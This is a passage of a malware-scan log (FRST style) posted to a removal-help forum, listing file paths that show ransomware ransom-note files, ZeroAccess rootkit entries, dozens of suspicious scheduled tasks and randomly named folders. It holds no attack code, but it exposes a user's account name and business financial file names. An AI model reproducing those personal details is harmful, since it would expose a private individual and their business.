00:21 - 2014-09-26 00:05 - 00000346 _____ () C:\Windows\Tasks\At1.job2014-09-07 00:16 - 2014-09-08 21:58 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Vabuoq2014-09-07 00:16 - 2014-09-08 19:46 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ymekwea2014-09-06 23:10 - 2014-09-06 23:10 - 00008172 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML2014-09-06 23:10 - 2014-09-06 23:10 - 00004130 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT2014-09-06 23:10 - 2014-09-06 23:10 - 00000252 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL2014-09-06 23:06 - 2014-09-08 22:32 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Oppaekda2014-09-06 23:05 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\EbduHufvu2014-09-06 22:50 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ugyldoz2014-09-06 22:47 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\EwrovBofre2014-09-06 22:21 - 2014-09-11 14:32 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ozowweu2014-09-06 22:20 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\OsesoDnisi2014-09-06 21:17 - 2014-09-06 21:17 - 00006144 __RSH () C:\Users\smotamedy\AppData\Roaming\{00006DF7-3334-60DC-FBCD-7BF237D757AA}.exe2014-09-06 18:24 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Nasuqaw2014-09-06 18:22 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\OlupGawt2014-09-06 18:17 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ynapocly2014-09-06 18:14 - 2014-09-06 18:14 - 00000000 ____D () C:\ProgramData\IhegOhrab2014-09-06 18:00 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Hykikeew2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\administrator\DECRYPT_INSTRUCTION.HTML2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\administrator\AppData\Local\DECRYPT_INSTRUCTION.HTML2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\administrator\AppData\DECRYPT_INSTRUCTION.HTML2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\admin\DECRYPT_INSTRUCTION.HTML2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\admin\AppData\Local\DECRYPT_INSTRUCTION.HTML2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\admin\AppData\DECRYPT_INSTRUCTION.HTML2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\administrator\DECRYPT_INSTRUCTION.TXT2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\administrator\AppData\Local\DECRYPT_INSTRUCTION.TXT2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\administrator\AppData\DECRYPT_INSTRUCTION.TXT2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\admin\DECRYPT_INSTRUCTION.TXT2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\admin\AppData\Local\DECRYPT_INSTRUCTION.TXT2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\admin\AppData\DECRYPT_INSTRUCTION.TXT2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\administrator\DECRYPT_INSTRUCTION.URL2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\administrator\AppData\Local\DECRYPT_INSTRUCTION.URL2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\administrator\AppData\DECRYPT_INSTRUCTION.URL2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\admin\DECRYPT_INSTRUCTION.URL2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\admin\AppData\Local\DECRYPT_INSTRUCTION.URL2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\admin\AppData\DECRYPT_INSTRUCTION.URL2014-09-06 17:57 - 2014-09-08 10:23 - 00000000 ___HD () C:\0e313562014-09-06 17:57 - 2014-09-06 17:57 - 00000000 ____D () C:\ProgramData\UsmiTfow2014-09-05 14:33 - 2014-09-05 14:33 - 00145488 _____ () C:\Windows\Minidump\090514-21075-01.dmp2014-09-04 08:19 - 2014-09-27 17:57 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job2014-09-04 08:19 - 2014-09-04 08:19 - 00699568 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe2014-09-04 08:19 - 2014-09-04 08:19 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-27 17:56 - 2014-01-31 12:51 - 01195387 _____ () C:\Windows\WindowsUpdate.log2014-09-27 16:57 - 2009-07-13 23:34 - 00016976 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A02014-09-27 16:57 - 2009-07-13 23:34 - 00016976 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A02014-09-27 16:50 - 2011-02-01 17:06 - 00000000 ____D () C:\Users\smotamedy\Tracing2014-09-27 16:49 - 2014-04-09 17:55 - 00004348 _____ () C:\Windows\setupact.log2014-09-27 16:49 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT2014-09-27 15:19 - 2014-01-29 13:07 - 00000000 ____D () C:\ali2014-09-27 15:00 - 2010-09-03 03:08 - 00000332 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job2014-09-27 14:49 - 2013-07-23 10:22 - 00000000 ____D () C:\ProgramData\evwqqrk2014-09-27 14:49 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Speech2014-09-27 14:48 - 2014-01-30 13:01 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\JAM Software2014-09-27 14:48 - 2012-03-05 14:06 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ezrige2014-09-27 14:11 - 2009-07-21 00:30 - 00782154 _____ () C:\Windows\system32\PerfStringBackup.INI2014-09-24 19:09 - 2010-11-01 09:39 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Skype2014-09-17 10:22 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\NDF2014-09-14 09:00 - 2010-09-03 03:08 - 00000528 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job2014-09-09 12:17 - 2009-07-13 23:53 - 00032574 _____ () C:\Windows\Tasks\SCHEDLGU.TXT2014-09-09 11:44 - 2010-10-29 15:17 - 00000000 ____D () C:\Users\administrator2014-09-08 22:36 - 2012-05-07 09:42 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Heyqu2014-09-08 22:30 - 2011-09-06 17:39 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Mozilla2014-09-08 22:27 - 2012-05-07 09:42 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Fioval2014-09-08 22:12 - 2012-03-05 14:06 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Altyc2014-09-08 22:02 - 2010-12-03 11:16 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\webex2014-09-08 21:26 - 2010-10-29 15:38 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Adobe2014-09-08 21:05 - 2010-10-29 15:29 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\DesktopPwrMgr2014-09-08 20:57 - 2012-05-07 09:42 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Odpya2014-09-08 20:47 - 2012-11-14 13:39 - 00000000 ___HD () C:\Users\smotamedy\AppData\Roaming\AC8087BE2014-09-08 18:52 - 2010-10-29 15:38 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Macromedia2014-09-08 17:47 - 2012-03-05 14:06 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Aptu2014-09-07 03:15 - 2010-10-30 15:16 - 00000176 _____ () C:\Windows\system32\config\netlogon.ftl2014-09-07 01:28 - 2011-09-06 15:06 - 00000536 _____ () C:\Users\smotamedy\UpToDateDesktop_stout.txt2014-09-07 01:28 - 2010-11-01 09:20 - 00000000 ____D () C:\Users\smotamedy\UpToDate2014-09-07 01:28 - 2010-10-29 15:29 - 00000000 ____D () C:\Users\smotamedy2014-09-07 01:27 - 2012-03-03 11:31 - 00032280 ____N () C:\Users\smotamedy\Documents\Jan expenses 2012.xls2014-09-07 01:27 - 2011-12-02 13:10 - 00012312 ____N () C:\Users\smotamedy\Documents\October_2011.xlsx2014-09-07 01:27 - 2011-07-18 14:50 - 00033816 ____N () C:\Users\smotamedy\Documents\Riveroaks OTC 07 11 11 thru 07 15 11.xls2014-09-07 01:27 - 2011-07-18 14:50 - 00016664 ____N () C:\Users\smotamedy\Documents\Riveroaks OTC 07 04 11 thru 07 08 11.xls2014-09-07 01:27 - 2011-05-23 12:24 - 00512024 ____N () C:\Users\smotamedy\Documents\MD stats 2010 (9).xls2014-09-07 01:26 - 2013-07-15 12:31 - 08812568 _____ () C:\Users\smotamedy\Desktop\River Oaks Beauty and Wellness Group (Backup Jul 15,2013 12 30 PM).QBB2014-09-07 01:26 - 2012-01-05 18:53 - 00030744 ____N () C:\Users\smotamedy\Documents\dec 2011 colection expenses.xls2014-09-07 01:26 - 2011-12-20 18:38 - 00022552 _____ () C:\Users\smotamedy\Documents\expenses for 2011-2012.xls2014-09-07 01:26 - 2011-12-02 13:19 - 00030744 ____N () C:\Users\smotamedy\Documents\Copy of Xl0000024.xls2014-09-07 01:26 - 2011-12-02 13:13 - 00012312 ____N () C:\Users\smotamedy\Documents\collection,expenses Oct 2011.xlsx2014-09-07 01:26 - 2011-12-02 12:41 - 00030744 ____N () C:\Users\smotamedy\Documents\Copy of Xl0000021.xls2014-09-07 01:26 - 2011-12-02 11:48 - 00031256 ____N () C:\Users\smotamedy\Documents\Collection,expenses Nov 2011.xls2014-09-07 01:26 - 2011-07-07 11:41 - 00014616 ____N () C:\Users\smotamedy\Documents\cleaning duties.xls2014-09-07 01:21 - 2013-07-10 11:58 - 00000000 ____D () C:\Users\Public\Documents\Intuit2014-09-07 01:21 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public2014-09-06 23:10 - 2013-07-10 11:58 - 00000000 ____D () C:\ProgramData\Intuit2014-09-06 23:10 - 2010-09-03 03:39 - 00000000 ____D () C:\ProgramData\Lenovo2014-09-06 23:10 - 2010-09-03 03:08 - 00000000 ____D () C:\ProgramData\PCDr2014-09-06 23:06 - 2009-07-21 01:20 - 00000000 ____D () C:\SWTOOLS2014-09-06 23:05 - 2010-09-03 03:09 - 00000000 ___HD () C:\ProgramData\DDNI2014-09-06 17:58 - 2010-10-30 11:03 - 00000000 ____D () C:\Users\admin2014-09-06 17:57 - 2009-07-21 01:20 - 00008728 __RSH () C:\BOOTSECT.BAK2014-09-05 14:33 - 2011-10-31 10:33 - 1273454962 _____ () C:\Windows\MEMORY.DMP2014-09-05 14:33 - 2011-10-31 10:33 - 00000000 ____D () C:\Windows\Minidump ZeroAccess:C:\$Recycle.Bin\S-1-5-21-499009960-272174587-744029597-1146\$0a1e85f3e1cd51d1261ae5ea5aa3df51 ZeroAccess:C:\$Recycle.Bin\S-1-5-18\$0a1e85f3e1cd51d1261ae5ea5aa3df51 Files to move or delete:====================C:\ProgramData\bw5EWA37M.datC:\Windows\Tasks\At1.jobC:\Windows\Tasks\At10.jobC:\Windows\Tasks\At11.jobC:\Windows\Tasks\At12.jobC:\Windows\Tasks\At13.jobC:\Windows\Tasks\At14.jobC:\Windows\Tasks\At15.jobC:\Windows\Tasks\At16.jobC:\Windows\Tasks\At17.jobC:\Windows\Tasks\At18.jobC:\Windows\Tasks\At19.jobC:\Windows\Tasks\At2.jobC:\Windows\Tasks\At20.jobC:\Windows\Tasks\At21.jobC:\Windows\Tasks\At22.jobC:\Windows\Tasks\At23.jobC:\Windows\Tasks\At24.jobC:\Windows\Tasks\At25.jobC:\Windows\Tasks\At26.jobC:\Windows\Tasks\At27.jobC:\Windows\Tasks\At28.jobC:\Windows\Tasks\At29.jobC:\Windows\Tasks\At3.jobC:\Windows\Tasks\At30.jobC:\Windows\Tasks\At31.jobC:\Windows\Tasks\At32.jobC:\Windows\Tasks\At33.jobC:\Windows\Tasks\At34.jobC:\Windows\Tasks\At35.jobC:\Windows\Tasks\At36.jobC:\Windows\Tasks\At37.jobC:\Windows\Tasks\At38.jobC:\Windows\Tasks\At39.jobC:\Windows\Tasks\At4.jobC:\Windows\Tasks\At40.jobC:\Windows\Tasks\At41.jobC:\Windows\Tasks\At42.jobC:\Windows\Tasks\At43.jobC:\Windows\Tasks\At44.jobC:\Windows\Tasks\At45.jobC:\Windows\Tasks\At46.jobC:\Windows\Tasks\At47.jobC:\Windows\Tasks\At48.jobC:\Windows\Tasks\At49.jobC:\Windows\Tasks\At5.jobC:\Windows\Tasks\At50.jobC:\Windows\Tasks\At51.jobC:\Windows\Tasks\At52.jobC:\Windows\Tasks\At53.jobC:\Windows\Tasks\At54.jobC:\Windows\Tasks\At55.jobC:\Windows\Tasks\At56.jobC:\Windows\Tasks\At57.jobC:\Windows\Tasks\At58.jobC:\Windows\Tasks\At59.jobC:\Windows\Tasks\At6.jobC:\Windows\Tasks\At60.jobC:\Windows\Tasks\At61.jobC:\Windows\Tasks\At62.jobC:\Windows\Tasks\At63.jobC:\Windows\Tasks\At64.jobC:\Windows\Tasks\At65.jobC:\Windows\Tasks\At66.jobC:\Windows\Tasks\At67.jobC:\Windows\Tasks\At68.jobC:\Windows\Tasks\At69.jobC:\Windows\Tasks\At7.jobC:\Windows\Tasks\At70.jobC:\Windows\Tasks\At71.jobC:\Windows\Tasks\At72.jobC:\Windows\Tasks\At73.jobC:\Windows\Tasks\At74.jobC:\Windows\Tasks\At75.jobC:\Windows\Tasks\At76.jobC:\Windows\Tasks\At77.jobC:\Windows\Tasks\At78.jobC:\Windows\Tasks\At79.jobC:\Windows\Tasks\At8.jobC:\Windows\Tasks\At80.jobC:\Windows\Tasks\At81.jobC:\Windows\Tasks\At82.jobC:\Windows\Tasks\At83.jobC:\Windows\Tasks\At84.jobC:\Windows\Tasks\At85.jobC:\Windows\Tasks\At86.jobC:\Windows\Tasks\At87.jobC:\Windows\Tasks\At88.jobC:\Windows\Tasks\At89.jobC:\Windows\Tasks\At9.jobC:\Windows\Tasks\At90.jobC:\Windows\Tasks\At91.jobC:\Windows\Tasks\At92.jobC:\Windows\Tasks\At93.jobC:\Windows\Tasks\At94.jobC:\Windows\Tasks\At95.jobC:\Windows\Tasks\At96.job Some content of TEMP:====================C:\Users\smotamedy\AppData\Local\Temp\SHSetup.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\explorer.exe => File is digitally signedC:\Windows\system32\winlogon.exe => File is digitally signedC:\Windows\system32\wininit.exe => File is digitally signedC:\Windows\system32\svchost.exe => File is digitally signedC:\Windows\system32\services.exe => File is digitally signedC:\Windows\system32\User32.dll => File is digitally signedC:\Windows\system32\userinit.exe => File is digitally signedC:\Windows\system32\rpcss.dll => File is digitally signedC:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-09-26 00:05 ==================== End Of Log ============================ Addition.txt
- September 27, 2014
- 3 replies

Sign In

aagah

Posts

Joined

Last visited

Reputation

dllhost32 keeps running with javascript RunHtmlApplication

Browse

Activity

Personal

Business

Business Modules

Partners

Learn

Start here

Type of malware/attacks

How does it get on my computer?

Scams and grifts

Support

Important Information